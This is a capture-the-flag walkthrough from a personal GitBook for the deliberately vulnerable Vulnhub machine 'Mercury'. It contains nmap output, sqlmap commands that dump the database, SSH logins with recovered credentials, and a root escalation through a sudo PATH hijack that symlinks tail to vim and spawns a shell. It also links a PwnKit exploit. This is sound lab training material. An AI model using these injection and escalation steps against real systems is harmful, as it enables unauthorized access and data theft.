🖋️
Cybersecurity Long haul
  • Road to PNPT
  • Book List
  • VirtualBox and OPNsense Setup
    • Installing OPNsense
      • VLAN Setup
        • Configuring OPNsense
          • Interface Configuration
          • Firewall Rules
            • DNS Resolver
              • Import Vulnerable Machine
  • Virtual Hacking Labs
  • VBSetup
  • OSCP Machine List:
  • Vulnhub Walkthroughs
    • Kioptrix 1
    • The Planets
      • Mercury
      • Venus
      • Earth
    • DC Series
      • DC-1
      • DC-2
      • DC-3
      • DC-4
  • HackMyVM
    • Easy
      • Gift
      • Pwned
      • Connection
      • BaseME
      • Hommie
Powered by GitBook
On this page

Was this helpful?

  1. Vulnhub Walkthroughs
  2. The Planets

Mercury

Mercury is defined as an easy box with no brute forcing. Lets check it out.

PreviousThe PlanetsNextVenus

Last updated 1 year ago

Was this helpful?

nmap -A -vv 192.168.50.70 Starting Nmap 7.93 ( ) at 2022-11-12 16:04 PST NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 16:04 Completed NSE at 16:04, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 16:04 Completed NSE at 16:04, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 16:04 Completed NSE at 16:04, 0.00s elapsed Initiating Ping Scan at 16:04 Scanning 192.168.50.70 [2 ports] Completed Ping Scan at 16:04, 0.00s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 16:04 Completed Parallel DNS resolution of 1 host. at 16:04, 0.00s elapsed Initiating Connect Scan at 16:04 Scanning mercury (192.168.50.70) [1000 ports] Discovered open port 22/tcp on 192.168.50.70 Discovered open port 8080/tcp on 192.168.50.70 Completed Connect Scan at 16:04, 0.07s elapsed (1000 total ports) Initiating Service scan at 16:04 Scanning 2 services on mercury (192.168.50.70) Completed Service scan at 16:05, 91.18s elapsed (2 services on 1 host) NSE: Script scanning 192.168.50.70. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 16:05 Completed NSE at 16:05, 0.16s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 16:05 Completed NSE at 16:05, 1.01s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 16:05 Completed NSE at 16:05, 0.00s elapsed Nmap scan report for mercury (192.168.50.70) Host is up, received conn-refused (0.00036s latency). Scanned at 2022-11-12 16:04:11 PST for 92s Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c824ea2a2bf13cfa169465bdc79b6c29 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCv2kWy2C3yUkz42v3fw7LeUhH6rqOhQqqU4KNMv3Hh/25dEI3F1+BrJlimrVxH3B7WNoyAS205KACPRmvyI4I27yyXfMZ1E15D94+ZNfSE/6dG5qFNxUuJzPeVZVg3Rr2A4qMULAGQUqZAhd0vdb4QX3LyseGkigqn1POhL5wTTRCXrgAr8iWPqJxIt0AJQQvIvSZkwzHVxn1Bn7+/FMKGjimGujAIWg2GFPk1FHPjULQWgEcPCUO0z4lgaHAqZCr9xG3iSYESh0XCQnxpZA2PgrgMpaDr2QR/tklK1hRpg+eylg20UlWVPzg5BRAA+uyX3Qax3K6BCPokTSPXwN13qfgeu95G1cdE4OJhy7ENpiP/M01hfCi6cy+PhhgpN0UwbSaO1UmvmAgJjcJbHbD5hk9xuHbuzhiWdUj02ftGKwS4qG9f2EhIKwy95RKseq3p2rH9K0H8rLMRqSP9pQ8CF5aynHsdCZtWWYWh/2licfzvm0xLwAuTBljDmqicSH8= | 256 e808a18e7d5abc5c66164824570dfab8 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPRFXRHxQ1CAUIiG81tUpJAjV4KTvplX+pdVuqHW68CGXyVwTxPQq01UM2e7IXiYdB0oXsXn7YQAa2ti2y6FUxA= | 256 2f187e1054f7b917a2111d8fb330a52a (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEA7N/wSYGrz/Nb9cd1KwzZfsScvv9FX1naKAxVg/Wog 8080/tcp open http-proxy syn-ack WSGIServer/0.2 CPython/3.8.2 |_http-server-header: WSGIServer/0.2 CPython/3.8.2 | http-robots.txt: 1 disallowed entry |_/ | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 Not Found | Date: Sun, 13 Nov 2022 00:04:18 GMT | Server: WSGIServer/0.2 CPython/3.8.2 | Content-Type: text/html | X-Frame-Options: DENY | Content-Length: 2366 | X-Content-Type-Options: nosniff | Referrer-Policy: same-origin | <!DOCTYPE html> | <html lang="en"> | <head> | <meta http-equiv="content-type" content="text/html; charset=utf-8"> | <title>Page not found at /nice ports,/Trinity.txt.bak</title> | <meta name="robots" content="NONE,NOARCHIVE"> | <style type="text/css"> | html * { padding:0; margin:0; } | body * { padding:10px 20px; } | body * * { padding:0; } | body { font:small sans-serif; background:#eee; color:#000; } | body>div { border-bottom:1px solid #ddd; } | font-weight:normal; margin-bottom:.4em; } | span { font-size:60%; color:#666; font-weight:normal; } | table { border:none; border-collapse: collapse; width:100%; } | vertical-align: | GetRequest, HTTPOptions: | HTTP/1.1 200 OK | Date: Sun, 13 Nov 2022 00:04:18 GMT | Server: WSGIServer/0.2 CPython/3.8.2 | Content-Type: text/html; charset=utf-8 | X-Frame-Options: DENY | Content-Length: 69 | X-Content-Type-Options: nosniff | Referrer-Policy: same-origin | Hello. This site is currently in development please check back later. | RTSPRequest: | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" | " | <html> | <head> | <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> | <title>Error response</title> | </head> | <body> | <h1>Error response</h1> | <p>Error code: 400</p> | <p>Message: Bad request version ('RTSP/1.0').</p> | <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p> | </body> |_ </html> |_http-title: Site doesn't have a title (text/html; charset=utf-8). | http-methods: |_ Supported Methods: GET HEAD OPTIONS 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at : SF-Port8080-TCP:V=7.93%I=7%D=11/12%Time=63703481%P=x86_64-pc-linux-gnu%r(G SF:etRequest,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2013\x20Nov\x20 SF:2022\x2000:04:18\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\. SF:2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x SF:20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosniff SF:\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x20is\ SF:x20currently\x20in\x20development\x20please\x20check\x20back\x20later\. SF:")%r(HTTPOptions,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2013\x20 SF:Nov\x202022\x2000:04:18\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython SF:/3\.8\.2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Opt SF:ions:\x20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20no SF:sniff\r\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site SF:\x20is\x20currently\x20in\x20development\x20please\x20check\x20back\x20 SF:later\.")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//D SF:TD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\" SF:\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20 SF:\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20con SF:tent=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<tit SF:le>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20 SF:<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x2 SF:0\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20 SF:\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP SF:/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20exp SF:lanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x SF:20or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html> SF:")%r(FourOhFourRequest,A28,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x SF:20Sun,\x2013\x20Nov\x202022\x2000:04:18\x20GMT\r\nServer:\x20WSGIServer SF:/0\.2\x20CPython/3\.8\.2\r\nContent-Type:\x20text/html\r\nX-Frame-Optio SF:ns:\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20no SF:sniff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<ht SF:ml\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\ SF:"\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20n SF:ot\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x2 SF:0<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<styl SF:e\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\ SF:x20margin:0;\x20}\n\x20\x20\x20\x20body\x20\*\x20{\x20padding:10px\x202 SF:0px;\x20}\n\x20\x20\x20\x20body\x20\*\x20\*\x20{\x20padding:0;\x20}\n\x SF:20\x20\x20\x20body\x20{\x20font:small\x20sans-serif;\x20background:#eee SF:;\x20color:#000;\x20}\n\x20\x20\x20\x20body>div\x20{\x20border-bottom:1 SF:px\x20solid\x20#ddd;\x20}\n\x20\x20\x20\x20h1\x20{\x20font-weight:norma SF:l;\x20margin-bottom:\.4em;\x20}\n\x20\x20\x20\x20h1\x20span\x20{\x20fon SF:t-size:60%;\x20color:#666;\x20font-weight:normal;\x20}\n\x20\x20\x20\x2 SF:0table\x20{\x20border:none;\x20border-collapse:\x20collapse;\x20width:1 SF:00%;\x20}\n\x20\x20\x20\x20td,\x20th\x20{\x20vertical-align:"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 16:05 Completed NSE at 16:05, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 16:05 Completed NSE at 16:05, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 16:05 Completed NSE at 16:05, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 92.84 seconds

Did a gobuster scan and found /robots.txt

This had a /* directory which led me to this page:

Lets look at mercuryfacts/

I spy with my little eye SQLi:

Oh yea! Lets reveal what's in that mercury database.

So we know that ssh is open from our nmap scan. Will skip the first users and try webmaster.

Yep that worked and we have the user flag.

ls -ll shows a notes.txt file so let's cat that out.

Well we already have webmaster's password.

Looking at linuxmaster's password looks like base64 so lets decode that.

Ok now we ssh in with linuxmaster.

Successfully logged in via ssh with linuxmaster:mercurymeandiameteris4880km

sudo -l shows:

linuxmaster@mercury:/usr/bin$ sudo -l Matching Defaults entries for linuxmaster on mercury: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User linuxmaster may run the following commands on mercury: (root : root) SETENV: /usr/bin/check_syslog.sh linuxmaster@mercury:/usr/bin$

Looks like we can run /usr/bin/check_syslog.sh, Which is a bash script:

linuxmaster@mercury:/usr/bin$ cat check_syslog.sh #!/bin/bash tail -n 10 /var/log/syslog linuxmaster@mercury:/usr/bin$

I'm guessing we can overwrite that and gain root privileges. Can't write to the file. Ofcourse it wouldn't be that easy. let's try and link tail to vim:

ln -s /usr/bin/vim tail

export PATH=$(pwd):$PATH

and lets try and open it in preserve-env mode:

sudo --preserve-env=PATH /usr/bin/check_syslog.sh

vi will open then execute: :!/bin/bash and we got root!

Pretty cool! If you run linpeas you will see that there are a couple different ways to root this machine. Perhaps an easier way is with CVE-2021-4034

Up next is Venus.

Interesting. Click "Load a fact."

sqlmap -u --dbs --batch

sqlmap -u http://192.168.50.70:8080/mercuryfacts -D mercury --dump-all --batch

https://nmap.org
">http://www.w3.org/TR/html4/strict.dtd">
https://nmap.org/cgi-bin/submit.cgi?new-service
http://www
https://nmap.org/submit/
http://192.168.50.70:8080/mercuryfacts/
LogoThe Planets: Mercury
LogoGitHub - arthepsy/CVE-2021-4034: PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)GitHub